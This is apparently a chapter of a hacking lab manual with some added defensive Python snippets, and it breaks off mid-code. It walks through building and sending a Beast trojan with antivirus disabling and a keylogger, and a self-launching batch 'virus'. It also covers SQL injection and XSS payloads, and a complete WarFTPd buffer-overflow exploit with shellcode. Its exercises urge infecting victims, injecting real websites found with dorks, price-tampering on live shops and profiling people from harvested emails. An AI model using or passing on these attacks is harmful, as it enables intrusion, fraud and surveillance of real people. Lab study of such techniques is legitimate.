A trojan is a form of malware which acts as a 'remote administration tool'. Upon execution, the server can establish a link with the client (victim). Although this demonstration is carried out using Beast, in a real world scenario other trojan kits might be more effective. The attacker must once again keep in mind that the concept behind the attack is what matters, and should perhaps look to create his/her own trojan kit.
Building a Trojan using Beast
● Launch the Beast GUI.
● Click on Build Server. This is the settings page of the file which will be executed on the victim's machine.
● In the Basic tab, specify the network settings for the file. The file will be referred to as 'server.exe'. Here you can also specify the program into which the trojan is to be injected. You can also set a password which will be required to connect to 'server.exe' when it is executed on the victim's computer.
● The Notifications tab provides options for 'server.exe' to inform the attacker about its current status. The medium of communication could be Email, ICQ, etc.
● The Startup tab is self-explanatory and provides configuration options for the startup event of 'server.exe'.
● The AV-FW Kill page provides settings for disabling anti-virus software and firewalls. It provides options for specific firewalls/AVs. Apart from this, there are also options for the
periodic killing of AVs/firewalls and the disabling of Windows XP firewall.
● Click on Misc. Most of the functions are self-explanatory. However, of particular note are:
○ Melt server on Install: this deletes 'server.exe'. However, the trojan is injected into various other files and programs, ensuring its continued functioning.
○ Enable keylogger: the keylogger logs all keystrokes and user activity. It can be used to monitor all user activity.
○ Delay execution: this is used to delay execution of the trojan, so as to avoid arousing the user's suspicion.
● Click on Exe Icon to specify the icon of 'server.exe'.
● You should now see 'server.exe' in the directory where you have installed Beast. Go back to the main window of Beast and click on Binder, to bind 'server.exe' with another inconspicuous file, such as a game, greeting, etc. This is where the attacker's social engineering skills come into play.
● The final file should be renamed accordingly and sent to the victim's computer. Once again, this will require social engineering on the part of the attacker.
Connecting to the victim’s computer
● Launch Beast. Specify the connection parameters and click on Connect to connect to the victim's machine.
● Once you specify the connection parameters
● Click on Managers. Here you can explore the Registry, File system, applications running and
active processes.
The features available are the same as those you would have when operating your own computer.
● Click on Windows and you can choose to Shut Down, Restart, Log Off, Crash the system, etc.
● Click on Lamer Stuff. All the options are self-explanatory and are mostly used to create a nuisance for the victim.
● Click on Fun Stuff. Once again, the options are self-explanatory. Chat is used to pop up a chat window on the victim's computer for a real-time conversation between the attacker and victim.
● Click on Server. Click on Update Server; here you can update the server remotely. Apart from this, you can also kill the server.
● Click on Misc. Here you can change the system time, send messages to the victim's desktop, get the log of the key logger, etc.
● Following is a sample of the decrypted log given by the logger:
************ Boot:[09/03/2013]-[16:56:32]
[Beast2.07]-[16:56:32]
[Beast 2.07]-[16:56:33]
r
[Run]-[16:56:44]
abcdedffaasdsadarun
[Program Manager]-[16:56:50]
[Beast 2.07]-[16:56:51]
[Information]-[16:56:53]
asdasfaf
[Decrypt Log File]-[16:57:02]
************ Boot:[09/03/2013]-[17:27:02]
[Beast2.07]-[17:27:02]
[Program Manager]-[17:27:03]
[Beast 2.07]-[17:27:04]
[Run]-[17:27:23]
[Program Manager]-[17:27:54]
[Paint]-[17:27:54]
[Untitled - Paint]-[17:27:54]
vs
[Save As]-[17:27:56]
7
[Untitled - Paint]-[17:27:59]
[7.png - Paint]-[17:27:59]
[Beast 2.07]-[17:28:03]
r
[Run]-[17:28:09]
[Program Manager]-[17:28:09]
[Paint]-[17:28:09]
[Untitled - Paint]-[17:28:09]
vs
[Save As]-[17:28:11]
8
[Untitled - Paint]-[17:28:14]
[8.png - Paint]-[17:28:14]
[Settings]-[17:28:19]
[Beast 2.07]-[17:28:24]
Batch File Viruses
Viruses are malware which can replicate themselves and spread from one computer to another. It is a common misconception that viruses also include trojans, botnets, adware, etc.; this is untrue and is in fact the definition of malware. Note that every virus is malware, but the converse need not be true.
We will now try to create a simple batch file virus of our own. These viruses will generally not be detected by AVs, as they are just simple code. However, they can be read easily by the user. To avoid this, you can download a 'BAT to EXE' converter online. The one used in this tutorial is available at http://www.battoexeconverter.com/. Any other converter will also do.
Note: While playing with a batch virus you might cause irreversible damage to your machine, to the extent that you might have to format your system. Hence it is best to carry this out on a virtual machine.
Note: While these viruses might seem to be only potential nuisances, they can be written so as to bring down an entire machine.
● Open Notepad.
● Write the following code:
1 @echo off
2 :x
3 start notepad
4 start explorer
5 start control
6 goto x
Line 1 prevents the commands from being displayed on the screen. Line 2 is a label; we will come to its use in a moment. Lines 3-5 launch Notepad, Explorer and Control Panel. Line 6 makes the program go back to Line 2 (with the help of the infamous goto statement and the label 'x'), causing repeated execution of Lines 3-5. Thus a large number of Notepad, Explorer and Control Panel windows are launched, which might cause the system to crash.
● Save the file as 'batchvirus.bat'.
● Now, to convert it to an EXE file, open 'Advanced BAT to EXE Converter'.
● Click on Open and select the BAT file we just created.
● Click on Build EXE and select Start Invisible.
● Select the file path to save the EXE to.
● Sure enough, we have our own batch file virus.
There are many ways to develop batch viruses; it is bounded only by your creativity. However, it might be a challenge to use batch viruses to actually infect other files.
theHarvester.py
theHarvester.py is an information gathering tool used to list email addresses and other info from the public domain. It is a part of the distribution for BackTrack. This particular demonstration makes use of BackTrack5. In order to perform this demonstration, follow the following steps:
● Launch BackTrack5. Go to /pentest/enumeration/theharvester. This is where theHarvester.py is located.
● Launch a terminal. Type in the following:
root@bt:~# cd /pentest/enumeration/theharvester
● Now that we are inside the directory, we need to launch the script. To do so, type in the following:
root@bt:~# ./theHarvester.py
● We will now try to use this tool to gain information about harvard.edu
● The next command to be entered is:
root@bt:/pentest/enumeration/theharvester# ./theHarvester.py -d harvard.edu -b google
Here '-d' is used to specify the domain name to search for and '-b' is used to specify the data source to use (Google, Bing, etc.).
● The command rightly lists all the email addresses it can find. Upon scrolling down, we can
also find the various hosts found.
The information obtained using theHarvester.py is of vital importance from a social engineering perspective. Gaining email addresses can help us pinpoint people with efficiency. This can of course be of huge help when employing social engineering tactics.
Exercises
1. Using a Trojan building kit, other than Beast, build a Trojan and successfully infect a
victim machine.
2. Without the use of any Trojan building kit, using only programming skills, try to create a
program which can act as a RAT. It need not pack all the features demonstrated, but
should be able to carry out basic functions.
3. Read more about batch file programming and use it to build a batch file virus which can
permanently crash the machine.
4. Using theHarvester.py, find out the email addresses associated with a random server
and use them to pinpoint a particular person.
Module Eight: Getting Offensive
Common Web Application Attacks
Objective
● To carry out common web application attacks, including SQL injection, XSS and Basic Access
Flaws.
● To use google dorks for information gathering.
Tools
● WebGoat: this is a controlled environment used for practising and learning about web application attacks. The purpose of WebGoat is to provide hands-on experience in carrying out attacks.
● TamperData: Firefox plugin used to intercept HTTP requests.
● Live HTTP Headers: Firefox plugin used to read HTTP headers.
Netcraft
http://news.netcraft.com/ is a service which can be used to gather information about websites. The IP address, OS running on the server, hosting country, risk rating, etc. are often quite useful in narrowing down the type of attacks to be carried out on the given site during a pentest.
A typical site report looks as follows.
Configuring WebGoat
WebGoat is available for download from http://code.google.com/p/webgoat/downloads/list. The download includes instructions on setting up the application (README.txt). As it contains a bundle including Apache Tomcat, the JRE and the application itself, it is self-sufficient. If you get to the following screen successfully, it means that WebGoat is running.
Note: Disconnect from the network while using WebGoat, as the deliberately vulnerable application also exposes the network to attack.
SQL Injection
SQL Injection is an attack which looks to manipulate the SQL command sent to the server so as to
get data from the database, generally by virtue of the input given by the attacker.
SQL Injection on WebGoat
● Go to Injection Flaws > Stage 1: String SQL Injection
● In the password field, try putting in a random value, e.g. 'Sam'.
As expected, we are unable to log into the system.
Note: A real website will definitely not have its SQL commands up for display, so try to work without them.
Whatever input the attacker gives is delimited by quotes in almost all cases. The idea here is to manipulate this syntax so as to gain user access without having valid credentials.
Before doing this, install the TamperData add-on for Firefox.
Using TamperData
After installing:
● In your Firefox window, go to Tools>TamperData.
● Go to the TamperData window and click on Start Tamper.
● Put in any random password, e.g. "Pass123", in the password field. Click on the Login button. TamperData should show the following screen.
● Click on Tamper. This allows you to intercept the POST request and change the password
value that is sent to the server.
● The string ' or 1=1-- modifies the (probable) SQL command from:
select * from users where user='Larry' and pass='xyz';
to
select * from users where user='Larry' and pass='' or 1=1--';
The second statement contains a condition (1=1) which is always true, so the query returns all the users in the database, and the application by default logs in the first user in the table.
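The two statements above, executed for real against a throwaway database, as an added example that is not part of WebGoat or the lab manual: the vulnerable query builder reproduces the manual's injected statement and logs in the first user, and the parameterised version beside it treats the same input as data. Python's sqlite3 stands in for the application's database; the table, the accounts and the function names are my own (Larry/xyz follows the manual's example, and passwords are stored in clear only to mirror the lesson).

```python
"""String SQL injection: the vulnerable query next to the fix.

Added example, not part of WebGoat or the lab manual. An in-memory
SQLite database stands in for the application's users table. Passwords
are stored in clear only to mirror the lesson; a real application
stores a salted hash.
"""
import sqlite3


def make_db():
    """Constructed users table; 'Larry'/'xyz' follows the manual's example."""
    con = sqlite3.connect(":memory:")
    con.execute("CREATE TABLE users (user TEXT, pass TEXT)")
    con.executemany("INSERT INTO users VALUES (?, ?)",
                    [("Larry", "xyz"), ("Sam", "hunter2")])
    return con


def build_vulnerable_sql(user, password):
    """The flaw: the query text is assembled by pasting user input into it."""
    return f"select * from users where user='{user}' and pass='{password}'"


def login_vulnerable(con, user, password):
    """Runs the pasted-together query; returns the user logged in, or None.

    With password "' or 1=1--" the WHERE clause becomes
    (user='...' and pass='') or 1=1, the trailing quote is commented out,
    every row matches and the first row in the table is returned.
    """
    row = con.execute(build_vulnerable_sql(user, password)).fetchone()
    return row[0] if row else None


def login_safe(con, user, password):
    """The fix: placeholders keep the input as data, never as SQL syntax."""
    sql = "select * from users where user=? and pass=?"
    row = con.execute(sql, (user, password)).fetchone()
    return row[0] if row else None


if __name__ == "__main__":
    db = make_db()
    print(build_vulnerable_sql("Larry", "' or 1=1--"))
    print("vulnerable:", login_vulnerable(db, "nobody", "' or 1=1--"))
    print("safe:      ", login_safe(db, "nobody", "' or 1=1--"))
```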
● The above page shows us that we have successfully carried out the attack, giving us access to the user's account.
Havij
Havij is an automated SQL injection tool for pen testers. This can be used to greatly simplify the
process.
It also allows direct access to the database. All the tables are listed out with complete access.
The target URL should be the address of the page along with a marker (%inject_here%) after the parameter which is to be used for manipulation.
Handy Tricks
● SQL syntax may vary from web application to web application. Hence try different combinations to gain access.
● Do NOT memorise ' or 1=1-- as a keyword. Understand how it works in order to exploit the mechanism.
● At times input validation on the front end might not allow you to enter special characters. At such times it is best to use TamperData or Burp to intercept the HTTP requests.
● Although tools such as Havij can be used to compromise security easily, one should be careful not to use them as a script-kiddie tool.
Cross Site Scripting
Stored XSS
The injection/storage of a malicious script in a web application such that it is executed by the client's browser is called an XSS attack. Following is an example of a Stored XSS attack using WebGoat.
● Launch WebGoat and go to Cross Site Scripting (XSS) > Stored XSS Attacks.
● Put in a random title and, in the Message field, enter the script to be executed. Although the script used here is pretty straightforward, one can replace it with a malicious script.
● Click on Submit to save the message to the Message List.
● The newly stored message should appear in the Message List.
● Clicking on it should yield the following result.
The appearance of the alert confirms the successful execution of the script and the attack.
Reflected XSS
In this attack, the attacker usually creates a URL which contains the attack script and mails it, or uses other media, to get the user to access it, thereby compromising the user's security.
● Launch WebGoat, go to Cross Site Scripting > Reflected XSS.
● We have to look to exploit the access code field.
● In the access code field, after the three digit code, put in the following code:
<script>alert('Reflected XSS')</script>
● Click on Purchase. This should result in the showing of the alert.
● Hence, we have successfully executed the Reflected XSS attack.
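The fix for both lessons above, as an added example that is not part of WebGoat or the lab manual: the stored message rendered into element content and the access code echoed back inside an input's value attribute, each shown unescaped (the vulnerable rendering) and escaped for its context with html.escape from Python's standard library. The templates and function names are my own; the payload is the one used in the reflected XSS step.

```python
"""Stored and reflected XSS: the unescaped rendering next to the fix.

Added example, not part of WebGoat or the lab manual. Two rendering
contexts from the lessons: a message body placed in element content
(stored XSS) and an access code echoed back inside an input's value
attribute (reflected XSS). Output encoding for the context is the fix;
html.escape covers both contexts here.
"""
import html

# The payload used in the manual's reflected XSS step.
PAYLOAD = "<script>alert('Reflected XSS')</script>"


def render_message_unsafe(title, message):
    """Vulnerable: user text is pasted straight into the HTML."""
    return f"<h3>{title}</h3><p>{message}</p>"


def render_message_safe(title, message):
    """Fixed: escape <, >, &, quotes before placing text in element content."""
    return f"<h3>{html.escape(title)}</h3><p>{html.escape(message)}</p>"


def render_form_unsafe(access_code):
    """Vulnerable: the submitted value is echoed inside an attribute."""
    return f'<input name="code" value="{access_code}">'


def render_form_safe(access_code):
    """Fixed: quote=True (the default) also escapes double and single quotes,
    so the value cannot close the attribute and start a new tag."""
    return f'<input name="code" value="{html.escape(access_code, quote=True)}">'


def contains_script(rendered):
    """Crude check used for the demonstration: does a real <script> tag remain?"""
    return "<script" in rendered.lower()


if __name__ == "__main__":
    print(render_message_unsafe("hello", PAYLOAD))
    print(render_message_safe("hello", PAYLOAD))
    print(render_form_unsafe('123"' + PAYLOAD))
    print(render_form_safe('123"' + PAYLOAD))
```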
Handy Tricks
● When working on live websites look to check fields such as search fields for Reflected XSS.
● Many forums and message boards are still vulnerable to Stored XSS.
● Use Google Dorks to look for the message board list in specific websites.
Basic Authentication Flaws
Often web applications have improper mechanisms in place to retrieve or process forgotten passwords. The attacker looks to exploit this vulnerability in order to gain access.
Forgot Password
This vulnerability is present when the security question protecting the password is not as strong as the password itself.
● Launch WebGoat. Go to Authentication Flaws > Forgot Password.
● Enter the username 'webgoat' in the username field.
● The security answer should be pretty obvious. Try a couple of colours, such as 'blue', 'green', etc.
● Finally, 'red' will get us through.
Note: Although this vulnerability involves social engineering more than actual exploitation of a flaw in the system, it is still effective and can still be used to bypass the authentication of major mail sites.
Basic Authentication Flaw
Basic Access Authentication is used by the web browser to provide the username/password when making a request to the server. This information is encoded and sent to the server in an HTTP header; reading that header and decoding the value yields the user credentials.
● Launch WebGoat, go to Authentication Flaws > Basic Authentication.
● Open Live HTTP Headers (ensure that the Capture field is ticked) and refresh the Basic Authentication page.
● The highlighted entry is the authentication header along with the encoded value of the user credentials.
● Copy only 'Authorization' to the WebGoat Authentication Header Name field.
● Now we need to decode the base64 encoded value so as to get the username/password out of it.
● Go to http://yehg.net/encoding/index.php and paste the base64 encoded string in the textbox given.
● Click on 'Convert me!' to get the decoded value.
● There is the required username/password. Copy this string to the second textbox on the WebGoat Basic Authentication Flaw page.
● Click on Submit. You will now get a page saying that the vulnerability has been exploited successfully.
● Now we will try to log in using the 'basic:basic' credentials given on the congratulatory page.
● Clear your browser's cookies and active login sessions.
● In the URL field, put in the following URL:
http://basic:basic@localhost:8080/WebGoat/attack?Screen=187&menu=500&Restart=187
● Click on Submit; we should now see the following dialog box.
● Upon clicking 'OK' you will be logged into the website successfully.
● Hence we have successfully exploited the Basic Access Authentication Flaw.
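The decoding step done by the online converter above, and the reason the Wireshark sniffing earlier in this manual exposes such credentials, as an added example that is not part of WebGoat or the lab manual: Basic authentication is base64 encoding of "user:password", not encryption, so anyone who sees the request has the credentials. The functions pull the header out of a constructed captured request and decode it, and build one the other way round; the function names and the captured request are my own, and the credentials are the lesson's basic:basic.

```python
"""Basic authentication is encoding, not encryption.

Added example, not part of WebGoat or the lab manual. The Authorization
header carries base64("user:password"); anyone who sees the request, as
in the Wireshark and Live HTTP Headers steps, has the credentials. The
captured request below is constructed, not taken from a real server.
"""
import base64
import binascii

# Constructed request as a sniffer would show it; the credentials are
# the lesson's basic:basic.
CAPTURED_REQUEST = (
    "GET /WebGoat/attack?Screen=187&menu=500 HTTP/1.1\r\n"
    "Host: localhost:8080\r\n"
    "Authorization: Basic YmFzaWM6YmFzaWM=\r\n"
    "Cookie: JSESSIONID=constructed\r\n"
    "\r\n"
)


def build_basic_authorization(user, password):
    """What the browser sends: 'Basic ' + base64 of 'user:password'."""
    token = base64.b64encode(f"{user}:{password}".encode("utf-8")).decode("ascii")
    return f"Basic {token}"


def parse_basic_authorization(header_value):
    """Return (user, password) from a Basic header value, or None.

    Only the first ':' separates user from password, so a password
    containing ':' survives; a non-Basic scheme or malformed base64
    yields None.
    """
    scheme, _, token = header_value.strip().partition(" ")
    if scheme.lower() != "basic" or not token:
        return None
    try:
        raw = base64.b64decode(token.strip(), validate=True).decode("utf-8")
    except (binascii.Error, UnicodeDecodeError):
        return None
    user, sep, password = raw.partition(":")
    return (user, password) if sep else None


def credentials_in_request(raw_request):
    """Scan a captured HTTP request for a Basic Authorization header."""
    head = raw_request.split("\r\n\r\n", 1)[0]
    for line in head.split("\r\n")[1:]:          # skip the request line
        name, _, value = line.partition(":")
        if name.strip().lower() == "authorization":
            return parse_basic_authorization(value)
    return None


if __name__ == "__main__":
    print(credentials_in_request(CAPTURED_REQUEST))
    print(build_basic_authorization("basic", "basic"))
```

Because the value is recoverable by anyone on the path, Basic authentication is only acceptable over TLS, and the same decoding is what a defender runs over captures to find plaintext credentials on a network.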
Google Dorks
Google dorks are advanced searching techniques using Google. They are used to narrow down on specific content on the web or even in a particular website. For example, while checking for SQL injection on a website one will of course want to look at the login page. However, searching for this particular page manually takes effort and may turn out to be cumbersome. Hence, one can employ Google dorks to search for the probable login pages in the site.
Typical Google Dork syntax:
dork1:parameter1 dork2:parameter2 query.
Common Google Dorks
● cache: This is used to search cached pages for the given search query.
● link: Returns all the pages containing a link to the given parameter. For eg. link:www.nsd.org.in returns all the pages containing links to the given URL.
● related: This is used to display pages similar to the one specified.
● info: Returns whatever information Google has about the given site. There should be no space between the dork and the parameter.
● inurl: Returns all the pages containing the query word immediately after the dork in the URL of the page. For eg. [inurl:nsd isac] returns all the pages which contain 'nsd' in the URL and 'isac' anywhere in the document.
● allinurl: Returns all the pages containing all the query words after the dork in the URL of the page. For eg. [allinurl:nsd isac] returns all the pages which contain both 'nsd' and 'isac' in the URL.
● intitle: Returns all the pages containing the query word immediately after the dork in the title of the page. For eg. [intitle:nsd isac] returns all the pages which contain 'nsd' in the title and 'isac' anywhere in the document.
● allintitle: Returns all the pages containing all the query words after the dork in the title of the page. For eg. [allintitle:nsd isac] returns all the pages which contain both 'nsd' and 'isac' in the title.
● site: This is used to restrict the results to a given domain.
Google Dorks can be combined to specifically look for results. For eg. The following search query
can be used to search for the login page in a particular website, so that it can be checked for SQL
Injection.
inurl:login site:silverzone.org
Exercises
i. Using Google dorks, search for a website which contains a login page and try to execute SQL injection on it.
ii. Read about the Shopping Cart Attack and try to carry it out on an e-commerce website using TamperData/Burp Suite.
a. Hint: the Shopping Cart Attack involves interception of HTTP requests (demonstrated in the SQL injection part) so as to change the value of the bill and obtain items at a lower price.
iii. Complete the XSS challenge in WebGoat.
Module Nine: Exploiting
Buffer Overflows:
Objectives: At the end of this module you should be able
To perform buffer overflows in a program.
To understand and exploit programs.
To understand and use debuggers effectively.
To attack and get control of a system.
Description:
A buffer overflow attack is a technique where we bombard the program with a large amount of data, which causes the program to fail at a certain point.
We attach a debugger to catch the exception points, errors and overflowed areas, and critical events such as EIP being overwritten.
For this example we will be using the WarFTPd 1.6 FTP server on Windows XP.
WarFTPd:
i. Notice the little lightning icon up there?
ii. Click it to start the FTP server. (Remember, the FTP server listens on port 21.)
iii. You can connect to the FTP server with the telnet or nc command:
# nc <target.ip> 21
After connecting, you can type the "USER" command to give the username and the "PASS" command to provide the password.
Here I have entered more than 20 '!' characters, but it was not enough to crash the system; let's try with more characters.
The above step may be repeated until you crash the system or observe in the debugger that EIP is being overwritten.
For this we can use a simple FTP login script to log in to the FTP server:

use strict;
use Net::FTP;

# Constructed placeholders: replace with the target host and the credentials to send.
my $host     = "server.IP";
my $user     = "user";
my $password = "password";

my $f = Net::FTP->new($host) or die "Can't open $host\n";
$f->login($user, $password) or die "Can't log $user in\n";

Write and save the above code as <Somename>.pl and execute it:
# perl <Somename>.pl
The next step is to generate a large string for the USER and PASS input; let's use Perl to generate it for us:
# perl -e 'print "A" x 1000'
Now copy all the A's and paste them in place of the username and password in the above script.
Run the script and see if the application crashes.
If the program is not responding or has closed automatically, it has crashed.
If you have not attached the debugger already, do it now, and repeat the above step of executing the Perl script with the long string of A's.
Attaching the debugger:
Using OllyDbg
OllyDbg is one of the best ring 3 debuggers for Windows applications and is the one used in this demonstration.
To attach to a process click File->Attach, select the <Process name> and click on Attach.
Once the process is attached, run our Perl script again and observe OllyDbg catch the program crash.
The program crashes again, and the debugger shows a message saying "Access violation while executing 41414141". What it means is that the program tried to go to address 41414141 to execute code; since this is not a valid address, the system cannot proceed and all execution halts.
Observe which registers are overwritten.
Look at the upper right block of OllyDbg, which shows the CPU register values.
The values of ESP, EBP, EDI and EIP show 41414141, which is nothing but our character 'A' (ASCII 0x41) repeated.
This is our proof of concept that the value of EIP can be overwritten, which gives us control to jump to other memory locations.
If we can plant shellcode somewhere in memory, then we can use EIP to point to the starting address of our shellcode.
Writing the exploit:
To write the exploit we need to know some details accurately.
Let's see what we already know:
We already know that the program crashes when we send 1000 A's.
The EIP is successfully overwritten with A's.
What we need to know:
• Exactly at which byte EIP is being overwritten. (Without knowing it, we can't write our exploit, as we will not know where to place the address of our shellcode in the exploit.)
• Exactly how many bytes we have after EIP that ESP points to. (This is required as our shellcode will start from the address ESP points to, and our shellcode cannot exceed this size.)
Finding the exact Byte:
To find the exact byte, we can use a trial and error method by narrowing the boundaries of our variables, i.e. instead of 1000 A's we send 500 'A' and 500 'B'.
In the next round we would narrow it further by sending 400 'A' and 400 'B', and so on.
The other, easier method is to generate a unique string, send it across, observe it in OllyDbg and find the exact byte at which the 4 characters in EIP are present in the unique string.
In this case we have a program in BackTrack to generate the string and locate the exact byte number.
This tool is part of the Metasploit tools and is available in /opt/metasploit/msf3/tools/
Use pattern_create.rb to generate the unique string.
pattern_create.rb usage:
# ./pattern_create.rb 1000 (will create 1000 unique characters)
# ./pattern_create.rb 1000 A B C (creates 1000 characters of "ABC")
Replace the 1000 A's with the newly generated unique string in the Perl script for FTP login.
Before executing the script, remember to restart the program in Windows XP.
Once the script is executed and the program crashes, observe the value of EIP in OllyDbg.
The value here is "32714131"; to find the exact byte we use the program pattern_offset.rb, which is in the same folder as pattern_create.rb.
o pattern_offset.rb usage:
# ./pattern_offset.rb "unique value"
So the exact offset where EIP gets overwritten is "485".
Finding the Buffer space:
We have now found the exact byte at which EIP is overwritten. The next step is to find the amount of buffer space available on the stack for executing our shellcode.
In OllyDbg look for the unique string at ESP (this points to where the stack resides, i.e. where our shellcode will reside).
The marked letters (q4Aq5Aq6) are the 4 bytes for which we need to find the offset, to know the exact byte where the stack data originates.
We use the same pattern_offset.rb to find this offset too.
Let's check whether the buffer really starts at byte 493.
To check, let's modify our Perl script:
# perl -e 'print "A" x 485 . "BBBB" . "C" x 4 . "STAR" . "D" x 100'
This will generate a string that identifies the exact bytes of EIP and ESP.
Copy the generated string and place it in the variables username and password in our Perl script, and execute it after restarting the program in Windows XP.
This shows that EIP is indeed at 485 bytes, since it is overwritten with 42 (ASCII character B), and ESP
is overwritten with "STAR", which starts at 493.
Look at the stack dump and count the number of bytes overwritten by the letter "D" (ASCII
character 44) until it hits the SEH record.
That gives us 72 bytes of free space on the stack where our Shellcode can go.
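The offset lookup described above is easy to get wrong by hand (the debugger prints the register value, not the bytes as they lie in memory). The following is an added example, not code from the manual and not Metasploit's own pattern_create.rb / pattern_offset.rb: a small Python re-implementation of the same cyclic pattern, plus the probe string from the Perl one-liner, so the 485 and 493 offsets can be reproduced and checked offline. The function names and the PATTERN_MAX constant are this example's own.

```python
# Added example, not from the lab manual and not Metasploit's own code: a small
# re-implementation of the idea behind pattern_create.rb / pattern_offset.rb,
# plus the probe string from the Perl one-liner, so the 485 / 493 offsets
# above can be reproduced and checked offline.
import string
from typing import Optional

# Metasploit's pattern cycles three character sets (upper, lower, digit) as
# triples: "Aa0Aa1Aa2...Aa9Ab0Ab1..." No 4-byte window repeats within the
# first 26 * 26 * 10 * 3 = 20280 bytes, so 4 bytes read out of EIP or ESP map
# back to exactly one position.
PATTERN_MAX = 26 * 26 * 10 * 3


def pattern_create(length: int) -> str:
    """Return the first `length` characters of the cyclic pattern."""
    if length > PATTERN_MAX:
        raise ValueError("pattern is only unique up to %d bytes" % PATTERN_MAX)
    chunks = []
    for u in string.ascii_uppercase:
        for lo in string.ascii_lowercase:
            for d in string.digits:
                chunks.append(u + lo + d)
                if len(chunks) * 3 >= length:
                    return "".join(chunks)[:length]
    return "".join(chunks)[:length]


def pattern_offset(value: str, length: int = PATTERN_MAX) -> Optional[int]:
    """Locate a 4-byte value inside the pattern.

    `value` is either the 8 hex digits shown for a register in the debugger
    (e.g. "32714131") or the 4 characters seen in the stack dump (e.g. "q4Aq").
    A register value is byte-reversed first: x86 is little-endian, so the
    printed value is the reverse of the bytes' order in memory.
    """
    if len(value) == 8 and all(c in string.hexdigits for c in value):
        needle = bytes.fromhex(value)[::-1].decode("ascii", errors="replace")
    else:
        needle = value
    pos = pattern_create(length).find(needle)
    return pos if pos >= 0 else None


def build_probe(eip_offset: int, esp_offset: int, tail: int = 100) -> bytes:
    """Rebuild the verification string from the manual's Perl one-liner:
    A's up to EIP, "BBBB" over EIP, C's up to ESP, "STAR" at ESP, then D's.
    """
    filler = esp_offset - eip_offset - 4
    if filler < 0:
        raise ValueError("ESP offset must lie beyond the 4 bytes of EIP")
    return b"A" * eip_offset + b"BBBB" + b"C" * filler + b"STAR" + b"D" * tail


if __name__ == "__main__":
    print("EIP 32714131 ->", pattern_offset("32714131"))  # 485
    print("ESP q4Aq     ->", pattern_offset("q4Aq"))      # 493
    probe = build_probe(485, 493)
    print(len(probe), probe[485:489], probe[493:497])
```

The little-endian reversal is the step that matters: EIP shows 32714131, but the bytes in memory read "1Aq2", and it is that string which sits at offset 485. A value that is not in the pattern at all (for example 41414141 from the original all-A buffer) returns None rather than a misleading offset.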
Finding the JMP ESP instruction.
We need a JMP ESP instruction because we cannot hardcode the stack address and tell our
code to jump directly to our Shellcode. However, since ESP points at our buffer at the moment of the
crash, we can overwrite EIP with an address where a JMP ESP instruction is located; once executed it
jumps directly to our stack, where our Shellcode resides, and starts executing it.
There are various tools to find the JMP ESP instruction in a library.
We will use OllyDbg to find the instruction.
Let's look at the libraries used by the warftp program in OllyDbg. (Click on the icon to show the list of
libraries used by the program.)
In any exploit you write, try to find the JMP or other instruction you need in a library that you are
sure is loaded while the program executes, since some programs use optional libraries that are
not loaded every time.
Here we choose to find the instruction in SHELL32.dll, since it is always loaded for a program
that needs to be executed.
Click on shell32.dll and look for the instruction JMP ESP. (To find an instruction use Ctrl + F,
which opens the find box; enter the instruction you want to find and click on Find.)
We have found the JMP ESP instruction at "7C9D30D7".
This is the address we want to place in EIP. Note that it belongs to the shell32.dll build on this
Windows XP SP3 lab machine; other Windows versions and service packs load the library elsewhere.
Now we have all that we need; the next step is to find a Shellcode that we can place on our stack.
For the Shellcode, we will search exploit-db. You can write your own Shellcode and put it in, or
search other websites of your interest for Shellcode.
In this example, since we have a limit of 72 bytes, we will look for a Shellcode that is less than 72
bytes.
Exploit-db gave us some results for "Windows XP".
We can see that there are different Shellcodes of different sizes; we will choose the Windows XP
SP3 cmd.exe (26 bytes) one, since this machine is SP3 and we have no more than 72 bytes.
This is the cmd.exe Shellcode, which opens a command prompt when it runs inside our warftpd:
"\x8b\xec\x55\x8b\xec\x68\x65\x78\x65\x2F\x68\x63\x6d\x64\x2e".
"\x8d\x45\xf8\x50\xb8\xc7\x93\xc2\x77\xff\xd0"
We will modify our Perl FTP login script to fit in our JMP ESP address and our Shellcode.
Execute the Perl script and see the Windows command prompt open up.
Writing Shellcode:
Objectives: At the end of this module you should be able to
Understand Shellcode creation
Create a simple Shellcode
Understand opcodes and hex conversions of a binary file.
Description: Shellcode is code which, when executed on a machine, spawns a shell, giving access to possibly
a remote user/attacker.
It is a single continuous string of characters that can be sent as the payload of an exploit for
attacking a machine.
In this demo we will be using a simple sleep-function Shellcode, which sleeps for a given time and
exits.
For this to execute, we first have to find the address of the "Sleep" function in one of the Windows
libraries.
We have an excellent program called dllexportviewer.exe to find the address of any exported function.
Writing the Shellcode:
The given assembly code (sleep.asm):
[SECTION .text]
BITS 32
global _start
_start:
    xor eax, eax            ; eax = 0 (31 c0; no null byte, unlike mov eax, 0)
    mov ebx, 0x7c802442     ; address of Sleep found with dllexportviewer on this machine
    mov ax, 5000            ; eax = 5000 ms (66 b8 88 13; upper half is already zero)
    push eax                ; argument dwMilliseconds
    call ebx                ; Sleep(5000); this is the trailing ff d3 in the dump below
Steps:
Compile the given assembly code
#nasm -f bin -o sleep.bin sleep.asm
Obtain the opcodes using the xxd tool
# xxd -i sleep.bin
0x31, 0xc0, 0xbb, 0x42, 0x24, 0x80, 0x7c, 0x66, 0xb8, 0x88, 0x13, 0x50,
0xff, 0xd3
Format it as the following output by using xxd-shellcode.sh
# ./xxd-shellcode.sh sleep.bin
\x31\xc0\xbb\x42\x24\x80\x7c\x66\xb8\x88\x13\x50\xff\xd3
Testing the Shellcode
Compile the generated Shellcode, using the shellcodetest.c program below as a template.
Compile the program.
# gcc -o shellcodetest shellcodetest.c
Test the shellcode.
# ./shellcodetest.exe
(sleeps for 5 seconds) (then exits - and may core dump)
The Shellcode string generated should not contain null bytes, as a null byte terminates the string
and the program abruptly.
Avoiding Null Bytes:
Use the XOR opcode to zero registers when needed (xor eax, eax instead of mov eax, 0).
Use the AL, BL, CL, DL registers when 32 bits are not needed.
/* shellcodetest.c: Shellcode test template */
char code[] = "\x31\xc0\xbb\x42\x24\x80\x7c\x66\xb8\x88\x13\x50\xff\xd3";
int main(int argc, char **argv) {
    int (*func)() = (int (*)()) code; /* treat the byte string as a function */
    (*func)();                        /* jump into it; needs an executable data segment, else it faults */
    return 0;
}
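The two remaining steps of the procedure, turning the `xxd -i` byte list into the `\x..` string and checking it for null bytes, are mechanical, so here they are as an added Python example. This is not code from the manual and not xxd-shellcode.sh; the function names are this example's own, and the four short instruction encodings below are constructed here to show why the "Avoiding Null Bytes" advice works.

```python
# Added example, not from the lab manual or xxd-shellcode.sh: reproduce the
# formatting step (xxd -i output -> C "\x.." string) and the null-byte check in
# Python, and show why "xor eax, eax" / "mov ax, ..." avoid nulls.
import re
from typing import Dict, List

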